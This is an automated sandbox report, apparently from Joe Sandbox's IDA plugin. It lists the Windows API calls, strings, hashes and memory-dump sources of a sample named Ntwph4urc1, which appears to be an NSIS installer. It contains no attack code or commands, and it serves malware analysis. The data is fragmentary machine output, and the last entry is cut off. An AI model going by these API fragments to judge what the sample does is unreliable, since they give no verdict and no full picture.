                                              • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                              • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                              • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                              • GetSysColor.USER32(00000000), ref: 00404406
                                              • SetTextColor.GDI32(?,00000000), ref: 00404412
                                              • SetBkMode.GDI32(?,?), ref: 0040441E
                                              • GetSysColor.USER32(?), ref: 00404431
                                              • SetBkColor.GDI32(?,?), ref: 00404441
                                              • DeleteObject.GDI32(?), ref: 0040445B
                                              • CreateBrushIndirect.GDI32(?), ref: 00404465
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                              • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                              • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                              APIs
                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                • Part of subcall function 00405FC5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026C9,00000000,00000000,?,00000000,00000011), ref: 00405FDB
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                              • Instruction ID: d74bd8ffb6d519048d690203a29de729842be89db78b0864c200dffe12222895
                                              • Opcode Fuzzy Hash: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                              • Instruction Fuzzy Hash: 1451F875D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D1A
                                              • GetMessagePos.USER32 ref: 00404D22
                                              • ScreenToClient.USER32(?,?), ref: 00404D3C
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D4E
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D74
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                              • Instruction ID: 46b4da8a0d4c37396bcf421d2915c418c0d79b1a62bcd48facf8de7c649397b3
                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                              • Instruction Fuzzy Hash: 80015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61D0DBB4AA058BA5
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                              • MulDiv.KERNEL32(0006AB66,00000064,0006AD6A), ref: 00402F74
                                              • wsprintfW.USER32 ref: 00402F84
                                              • SetWindowTextW.USER32(?,?), ref: 00402F94
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                              Strings
                                              • verifying installer: %d%%, xrefs: 00402F7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              • API String ID: 1451636040-82062127
                                              • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                              • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                              • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                              • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                              APIs
                                                • Part of subcall function 73F5121B: GlobalAlloc.KERNEL32(00000040,?,73F5123B,?,73F512DF,00000019,73F511BE,-000000A0), ref: 73F51225
                                              • GlobalFree.KERNEL32(?), ref: 73F526A3
                                              • GlobalFree.KERNEL32(00000000), ref: 73F526D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                               • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: b982249fca5cdefd7550295221f36a1e669575db8a2007f9c16740be040ab67e
                                              • Instruction ID: 1acb46a5e4a24918c94af3c219d6ae9d5b7c6759948d434817c5f918fac53ca0
                                              • Opcode Fuzzy Hash: b982249fca5cdefd7550295221f36a1e669575db8a2007f9c16740be040ab67e
                                              • Instruction Fuzzy Hash: 1D31BC3320510AFFDB16AF65CDA4F2E7BFAEB853907354229F10AC7260C730A8058B61
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                              • GlobalFree.KERNEL32(?), ref: 004029F0
                                              • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                              • String ID:
                                              • API String ID: 2667972263-0
                                              • Opcode ID: d8979d593ffb7cda73e724eb2d1dda972fc418b833f0f64d77b01377f8a14e7c
                                              • Instruction ID: a183675b87451ddc5318bffc5c3e349b28a5858cebf66036b341c16136851789
                                              • Opcode Fuzzy Hash: d8979d593ffb7cda73e724eb2d1dda972fc418b833f0f64d77b01377f8a14e7c
                                              • Instruction Fuzzy Hash: B521AE71800124BBDF216FA5DE4999F7E79EF04364F10023AF560762E1CB784D419B98
                                              APIs
                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp
                                              • API String ID: 3248276644-2827779590
                                              • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                              • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                              • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                              • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                               • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FreeGlobal
                                              • String ID:
                                              • API String ID: 2979337801-0
                                              • Opcode ID: 4f8204407e08878a1fe099d1dd156029c37ef8e3ce162cca76b6d081ef11c8b1
                                              • Instruction ID: f62e65283915a1130066108c5f3b6ab29b1b5f1d79dbdb5a5f6e492366a89dc1
                                              • Opcode Fuzzy Hash: 4f8204407e08878a1fe099d1dd156029c37ef8e3ce162cca76b6d081ef11c8b1
                                              • Instruction Fuzzy Hash: 7951B332D10D5AEBDF239FA48940BADBBFAAB443D0B154259F406E3185D770BE818791
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 73F52522
                                                • Part of subcall function 73F5122C: lstrcpynW.KERNEL32(00000000,?,73F512DF,00000019,73F511BE,-000000A0), ref: 73F5123C
                                              • GlobalAlloc.KERNEL32(00000040), ref: 73F524A8
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73F524C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                               • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID:
                                              • API String ID: 4216380887-0
                                              • Opcode ID: a97b84a92057db44a9c87f3ae6ce3446388494220a9ca59e8ff776a490950b8b
                                              • Instruction ID: 95dd64170c8dd590d5319f92cab279ef87a44695d69ea8a7d5a4c34354c7aa4e
                                              • Opcode Fuzzy Hash: a97b84a92057db44a9c87f3ae6ce3446388494220a9ca59e8ff776a490950b8b
                                              • Instruction Fuzzy Hash: AC41CDB210870AEFD715AF61DC90B6A77F8FB58391F204A2DF44BC6192D730A545CBA1
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                              • Instruction ID: b40b93da7826e3b7615b819c1b58470e7634271ab5df736de73e72df9abaa9c9
                                              • Opcode Fuzzy Hash: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                              • Instruction Fuzzy Hash: 1521F572904119AFCB05DFA4DE45AEEBBB5EB08304F14403AF945F62A0CB389D51DB99
                                              APIs
                                              • GetDC.USER32(?), ref: 00401E51
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                              • Instruction ID: e0f466a359637f901669b8d4edcb0a2768f8d1cf7dbd19b4a84ec7a1be175679
                                              • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                              • Instruction Fuzzy Hash: 3301D871950651EFEB006BB4AE89BDA3FB0AF15300F10493AF141B71E2C6B90404DB2D
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73F52238,?,00000808), ref: 73F51635
                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73F52238,?,00000808), ref: 73F5163C
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73F52238,?,00000808), ref: 73F51650
                                              • GetProcAddress.KERNEL32(73F52238,00000000), ref: 73F51657
                                              • GlobalFree.KERNEL32(00000000), ref: 73F51660
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                               • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              • Opcode ID: 7b9b7adccdf88cfbc326afbfa25b67313081b217e6cf14c3d088a0c45bb8f92b
                                              • Instruction ID: 8b3a933f08892f9f312cded3914ce0e24333990ffbb0554787fb8479e454826b
                                              • Opcode Fuzzy Hash: 7b9b7adccdf88cfbc326afbfa25b67313081b217e6cf14c3d088a0c45bb8f92b
                                              • Instruction Fuzzy Hash: F3F0AC7320A1387BD62136A78C4CD9BBE9CDF8B2F5B310215F62D921A086615D02DBF1
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                              • Instruction ID: 189cbaabe8764c773f58747126bd63a1e8498669fac95269da527f62f649557f
                                              • Opcode Fuzzy Hash: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                              • Instruction Fuzzy Hash: EE21AD7195420AAEEF05AFB4DD4AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                              APIs
                                              • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                              • wsprintfW.USER32 ref: 00404C9B
                                              • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
